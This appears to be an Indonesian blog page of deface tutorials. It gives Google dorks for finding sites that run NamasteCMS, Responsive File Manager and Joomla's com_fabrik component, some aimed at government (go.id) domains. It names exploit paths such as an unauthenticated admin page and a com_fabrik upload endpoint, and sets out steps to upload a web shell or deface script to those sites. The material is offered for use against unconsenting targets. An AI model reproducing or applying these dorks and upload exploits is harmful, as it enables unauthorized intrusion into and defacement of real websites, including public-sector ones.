Postingan

Gambar
ASSALAMUALAIKUM WR.WB  Cara Deface Poc Namastecms: Bahan:             Dork:                      - inurl:p-detail.php? site:in                      - inurl:p-detail.php intext:gallery                      - inurl:p-detail.php intext:bharat  {kembangin lagi aja ya supaya bisa dapat web yang perawan}            Exploit: /namastecms/admin.php ======================================= =========_________________________========= 1. Dorking ke mbah Google          2. Setelah ketemu masukan Exploitnya, jika website itu perawan maka akan langsung menuju ke dashboard admin          3. Kemudian masuk ke Gallery -> Add Gallery ,  Lalu pilih Choose File untuk upload Shellnya...
Gambar
Cara deface metode Responsive File Manager Dork:            - inurl:/assets/filemanager             - inurl:/filemanager/ intext:"dialog.php"            - inurl:/js/filemanager/ intext:"dialog.php" 1. Dorking dulu Ke google           2. Pilih salah satu website target. kalo sudah masuk, pilih file yang bernama ->dialog.php<-         3. klik "tombol upload"         4. Pilih script deface yang kalian ingin diupload 5. Jika sudah diupload, terus klik "Return to  files list"       6. Cara aksesnya tinggal tekan script deface kalian. Lalu pilih Show URL kemudian copy       7. Hasilnya      
Gambar
ASSALAMUALAIKUM WR.WB Cara Deface Poc Metode Com_Fabrik: Bahan:           1.Dork:                       - inurl:index.php?option=com_fabrik                       - inurl:importcsv.php site:go.id                       - inurl:index.php/component/fabrik/ site:go.id                       - inurl:index.php?option=com_fabrik&view= site:go.id { dikembangin lagi ya dorknya}           2.Exploit: /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload           3.CSRF: Comot Disini           4. Script Deface   ==================================== {~~~~~~~~~~~____________~~~~~~~~~~~} ...